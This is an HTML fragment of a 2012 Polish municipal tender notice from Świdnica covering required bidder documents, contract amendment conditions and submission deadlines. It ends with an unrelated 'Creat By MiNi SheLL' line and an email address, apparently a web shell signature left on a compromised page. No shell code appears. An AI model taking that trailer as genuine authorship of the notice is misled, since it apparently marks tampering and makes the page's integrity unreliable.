<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo Wykonawca winien do oferty dołączyć:
- zaparafowany projekt umowy - zał. nr 10 do oferty, wg wzoru zał. nr 8 do SIWZ,
- dowód wniesienia wadium - zał. nr 11 do oferty,
      - wykaz części zamówienia, których realizację Wykonawca zamierza powierzyć podwykonawcom - zał. 
        nr 9 do oferty, wg wzoru nr załącznik nr 6 do SIWZ,
 - pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona 
      do reprezentowania Wykonawcy z mocy prawa - zał. nr 12 do oferty,
      - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna)
        pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania
        w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 Ustawy -
        zał. nr 13 do oferty,
      - każdy z Wykonawców wspólnie ubiegających się o zamówienie, załączy dokumenty wskazane w pkt. 1, 2, 
        3,4,5,11,19,20 -  zał. nr 19 do oferty.
            Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, z treści której wynika iż odpowiadają solidarnie za zobowiązania oraz wskazują lidera konsorcjum. 

 Uwaga:
Załączony do SIWZ harmonogram rzeczowo-finansowy -  załącznik nr 18 do oferty Wykonawcy wg wzoru  nr 7, Wykonawca przedłoży w celu uzgodnienia z Zamawiającym przed podpisaniem umowy.  Podstawą wypełnienia harmonogramu rzeczowo-finansowego będą: oferta Wykonawcy sporządzona na bazie kalkulacji własnej Wykonawcy oraz uzgodnienia z Zamawiającym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich 
     warunkach jak umowa, której projekt stanowi zał. nr 8 do SIWZ. 
2.  Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony 
     w następujących przypadkach:
a.  jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b.  jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy
     przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji 
     zamówienia,
c.  Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie
   jest lub będzie miało wpływ  na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez Zamawiającego,
- szczególnie niesprzyjających warunków atmosferycznych np: intensywnych opadów deszczu,  spadku średniej dobowej temperatury powietrza poniżej wymagań dla procesów technologicznych, mogą zostać uwzględnione przez   Zamawiającego przy przesunięciu terminu realizacji zadania o liczbę  dni, w których zanotowano   niesprzyjające warunki i  liczbę dni potrzebnych do usunięcia ich skutków.     
- konieczności zmian w dokumentacji projektowej, 
d.  Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku:
     - wystąpienia robót nieprzewidzianych w specyfikacji technicznej wykonania i odbioru robót i projekcie,  
       których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy.
    -  jeżeli wystąpiły okoliczności wskazane w pkt 2b.
       Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja wykonawcy pozytywnie zweryfikowana    
	 przez inspektora nadzoru oraz Zamawiającego.
    e. Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem 
    właściwych kwalifikacji zawodowych.
3. Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po
    akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów,pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów,pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com